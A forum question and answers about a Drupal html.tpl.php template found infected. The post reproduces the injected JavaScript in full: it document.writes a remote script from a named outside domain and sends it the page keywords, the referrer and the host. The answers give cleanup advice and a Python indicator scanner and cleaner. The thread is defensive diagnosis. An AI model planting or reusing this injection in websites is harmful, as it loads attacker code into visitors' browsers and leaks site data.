David Smith - 10 days ago
PHP Question

PHP malware inside this apparently clean file?

I have a PHP file (html.tpl.php) inside a module for Drupal, with the following code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>

<head profile="<?php print $grddl_profile; ?>">
<?php print $head; ?>
<title><?php print $head_title; ?></title>
<?php print $styles; ?>
<?php print $scripts; ?>

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body class="<?php print $classes; ?>" <?php print $attributes;?>>
<div id="skip-link">
<a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
</div>
<?php print $page_top; ?>
<?php print $page; ?>
<?php print $page_bottom; ?>
</body>
</html>


My problem is that some antiviruses flag it as malware.

Please check this VirusTotal report.

Could this flag be caused by the inclusion of the script at the following URL?

http://atelier24-gerd-kallhardt.de/js/jquery.min.php

The file html.tpl.php lives in /modules/system/ (Drupal website).

You can download this file from here.

Then I have some questions:

  • Is this a legitimate file (despite a possible infection)?

  • Was it infected?

  • Is there both good and bad (malware) code in it?

  • How can I remove the bad part? Just by deleting that line of code with the script?

  • How could this code have got attached there?

Answer

That happened to me too. Some malware searches for an HTML opening file in the directory structure, I guess, and found this one first. Luckily, the one that was really used, from my theme, wasn't infected.

Search for that "atelier" text in all your files, or for some other string that came with this malware.

It's not especially bad, just a spammer.

Change all back-end admin and (S)FTP passwords, and make backups on a regular basis.

If you are on a shared host... hmm... maybe some other website was hacked, not yours.
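The answer's advice to search every file for the "atelier" string, and the question's "can I just delete that line", as an added example that is not code from the original post or from Drupal: a Python scanner that walks a site tree for the indicators visible in the injected block (the domain, the "jquery.min.php" name, and the document.write of a remote script tag), plus a cleaner that removes only <script> elements containing one of those indicators and leaves the template's PHP print tags intact. The sample site it builds is constructed here, using a trimmed copy of the injected line from the question; the indicator list and the file-suffix list are my own choices.

```python
import re
import tempfile
from pathlib import Path

# Indicator patterns. The domain and the "jquery.min.php" name come from the
# injected <script> in the question; the document.write pattern is a generic
# sign of a dropper that loads a second-stage script from a remote host.
INDICATORS = [
    re.compile(r"atelier24-gerd-kallhardt\.de", re.I),
    re.compile(r"jquery\.min\.php", re.I),
    re.compile(r"document\.write\(\s*['\"]<script", re.I),
]

# File types worth scanning in a Drupal 7 tree (templates, PHP, JS). My choice.
SCAN_SUFFIXES = (".php", ".inc", ".module", ".install", ".js", ".html")

# One whole <script>...</script> element, including the line break after it.
# The injected code splits its own closing tag as '<'+'/script>' precisely so
# that a naive match ends at the real </script>, which is what we want here.
SCRIPT_RE = re.compile(r"[ \t]*<script\b[^>]*>.*?</script>[ \t]*\r?\n?", re.S | re.I)


def scan_tree(root):
    """Return (relative path, line number, matched pattern) for every line hitting an indicator."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not path.name.endswith(SCAN_SUFFIXES):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for pat in INDICATORS:
                if pat.search(line):
                    hits.append((path.relative_to(root).as_posix(), lineno, pat.pattern))
                    break
    return hits


def clean_template(text):
    """Drop every <script> element containing an indicator; keep all other markup, PHP tags included."""
    removed = 0

    def replace(match):
        nonlocal removed
        if any(p.search(match.group(0)) for p in INDICATORS):
            removed += 1
            return ""
        return match.group(0)

    return SCRIPT_RE.sub(replace, text), removed


# Constructed sample data: a trimmed copy of the injected line from the question,
# a clean Drupal 7 core html.tpl.php head, and a clean theme override.
INJECTED_LINE = (
    "<script>var a='';setTimeout(10);if(document.referrer!==null){"
    "document.write('<script type=\"text/javascript\" "
    "src=\"http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164\">"
    "<'+'/script>');}</script>\n"
)
CLEAN_HEAD = (
    "<head profile=\"<?php print $grddl_profile; ?>\">\n"
    "<?php print $head; ?>\n"
    "<title><?php print $head_title; ?></title>\n"
    "<?php print $styles; ?>\n"
    "<?php print $scripts; ?>\n"
)


def build_sample_site(root):
    """Write a tiny fake Drupal tree: infected core template, clean theme template, clean settings."""
    root = Path(root)
    files = {
        "modules/system/html.tpl.php": CLEAN_HEAD + INJECTED_LINE + "</head>\n",
        "sites/all/themes/mytheme/templates/html.tpl.php": CLEAN_HEAD + "</head>\n",
        "sites/default/settings.php": "<?php\n$databases = array();\n",
    }
    for rel, content in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return list(files)


def run_demo():
    """Build the sample site, scan it, clean the infected file in place, and rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        before = scan_tree(tmp)
        infected = Path(tmp) / "modules/system/html.tpl.php"
        cleaned, removed = clean_template(infected.read_text(encoding="utf-8"))
        infected.write_text(cleaned, encoding="utf-8")
        after = scan_tree(tmp)
        return before, removed, after, "<?php print $scripts; ?>" in cleaned


if __name__ == "__main__":
    before, removed, after, kept_php = run_demo()
    for path, lineno, pattern in before:
        print(f"{path}:{lineno}: matches {pattern}")
    print(f"removed {removed} injected <script> element(s); hits after cleaning: {len(after)}; PHP tags kept: {kept_php}")
```

Two caveats from my side. A pattern cleaner only finds what it was told to look for, so after cleaning, diff the whole core tree against a pristine download of the same Drupal version rather than trusting the scan alone. And modules/system/html.tpl.php is the default template Drupal 7 core uses only when the active theme does not override it; the answer's point that the theme copy was the one actually rendered is worth verifying on your own site, because if the theme has no override the injected core file is what visitors received.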
